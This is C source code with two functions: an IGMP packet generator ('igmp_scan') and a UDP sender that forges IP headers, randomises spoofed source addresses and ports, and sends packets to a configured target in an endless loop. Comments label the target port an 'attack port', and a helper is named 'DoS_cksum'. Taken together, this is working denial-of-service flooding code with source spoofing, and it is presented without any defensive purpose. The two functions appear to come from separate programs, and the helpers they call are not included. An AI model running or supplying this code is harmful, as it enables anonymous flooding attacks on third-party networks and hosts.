int main(int argc, char *argv[])
{
int fd;
byte_t pkt[32];
int ttl;
in_addr_t src_ip, dst_ip, group_ip;
struct sockaddr_ll ll;
unsigned count;
unsigned ifindex;
if (argc < 6) {
printf("Usage igmp_scan <ttl> <iface> <src> <dest> <count>\n");
exit(1);
}
fd = socket(PF_PACKET, SOCK_DGRAM, ETH_P_IP);
if (fd == -1) {
perror("eth_open");
exit(1);
}
ttl = atoi(argv[1]);
ifindex = iface_index(argv[2]);
if (ifindex == -1) {
printf("Bad interface name '%s'\n", argv[2]);
exit(1);
}
src_ip = inet_addr(argv[3]);
dst_ip = inet_addr(argv[4]);
count = atoi(argv[5]);
do {
group_ip = dst_ip;
memset(pkt, 0, sizeof(pkt));
s_8 (pkt, 0, 0x46);
s_16(pkt, 2, sizeof(pkt));
s_8 (pkt, 8, ttl);
s_8 (pkt, 9, 2);
s_32(pkt, 12, htonl(src_ip));
s_32(pkt, 16, htonl(dst_ip));
s_32(pkt, 20, 0x94040000); /* router alert */
s_8 (pkt, 24, 0x16); /* membership report */
s_32(pkt, 28, htonl(group_ip));
s_16(pkt, 26, ip_sum(pkt+24, 8)); /* igmp csum */
s_16(pkt, 10, ip_sum(pkt, 32)-0x100); /* ip csum */
ll.sll_family = AF_PACKET;
ll.sll_protocol = htons(ETH_P_IP);
ll.sll_ifindex = ifindex;
ll.sll_hatype = htons(ARPHRD_ETHER);
ll.sll_pkttype = PACKET_MULTICAST;
ll.sll_halen = 6;
ll.sll_addr[0] = 1;
ll.sll_addr[1] = 0;
s_32(ll.sll_addr, 2, (0x5e<<24) | (ntohl(group_ip) & 0x7FFFFF));
sendto(fd, pkt, sizeof(pkt), 0, (struct sockaddr *)&ll, sizeof(ll));
dst_ip = htonl(ntohl(dst_ip)+0x10000);
if ((count % 10) == 0) {
usleep(1);
}
} while (--count);
return 0;
}
int
udp_send( )
{
struct ip *ipH;
struct udphdr *udpH;
char *packet;
int rawsock, sport;
struct sockaddr_in sin;
unsigned long saddr, daddr;
char ip1[4], ip2[4], ip3[4], ip[4];
int pkgsize = sizeof (struct ip) + sizeof(struct udphdr) + config.udp_pkgsize;
packet = (char *) malloc(sizeof (struct ip) + sizeof(struct udphdr) + config.udp_pkgsize);
ipH = (struct ip *) packet;
udpH = (struct udphdr *) (packet + sizeof(struct ip));
memset(packet, 0, pkgsize);
daddr = inet_addr(config.udp_targetip);
// ip header
ipH->ip_v = 4; /* version */
ipH->ip_hl = 5; /* header length */
ipH->ip_tos = 0x00; /* type of service */
//ipH->ip_len = pkgsize; /* total length */
ipH->ip_ttl = 255; /* time to live */
ipH->ip_off = 0; /* fragment offset field */
ipH->ip_id = htons(random_int(1, 65535)); /* identification */
ipH->ip_p = IPPROTO_UDP; /* protocol */
ipH->ip_sum = 0; /* checksum */
//ipH.ip_src.s_addr = saddr; /* source address */
ipH->ip_dst.s_addr = daddr; /* dest address */
//ipH.ip_sum = ip_sum((unsigned short*)&ipH,sizeof(ipH));//检验和
// udp header
//udpH.uh_sport = htons( sport ); //16位源端口
udpH->uh_dport = htons( config.udp_targetport ); //16位目的端口
udpH->uh_ulen = htons(sizeof(struct udphdr ) + config.udp_pkgsize); //16位UDP包长度
//udpH.uh_sum = 0; //16位校验和
//udpH.uh_sum = DoS_cksum((unsigned short*)&udp.udpH, pkgsize);//UDP校验和
sin.sin_family = AF_INET;
//sin.sin_port = htons(53); //攻击端口
sin.sin_addr.s_addr = daddr;
rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if( rawsock < 0 )
{
printf("[-]Error to open socket.\n");
return 1;
}
const int optVal = 1;
setsockopt(rawsock, SOL_SOCKET,SO_REUSEADDR | SO_BROADCAST, &optVal, sizeof(optVal));
if( setsockopt( rawsock , IPPROTO_IP , IP_HDRINCL , &optVal , sizeof( optVal ) ) < 0 )
{
printf("[-]Error to setsockopt to the socket.\n");
return 1;
}
printf("packet=%d, len=%d, pkgsize=%d\nsending ...\n", sizeof(packet), config.udp_pkgsize, pkgsize );
while(1)
{
saddr = ( strcmp(config.udp_sourceip, "*") == 0 ) ? random_lip() : inet_addr((config.udp_sourceip));
sport = config.udp_sourceport == 0 ? random_int(1, 65535) : config.udp_sourceport;
ipH->ip_id = htons(random_int(1, 65535));
ipH->ip_src.s_addr = saddr;
ipH->ip_sum = ip_sum((unsigned short*)&ipH, sizeof(ipH));
udpH->uh_sport = htons( sport );
ipH->ip_len = pkgsize;
//udpH->uh_sum = ip_sum((unsigned short*)&udpH, sizeof(udpH));
if( sendto( rawsock , packet, pkgsize , 0 , ( struct sockaddr *) &sin , sizeof(sin)) < 0 )
{
printf("[-]Error to sendto : %s[%d].\n" , strerror(errno), errno );
return 1;
}
if (config.udp_sleeptime > 0) usleep(config.udp_sleeptime);
}
return 0;
}
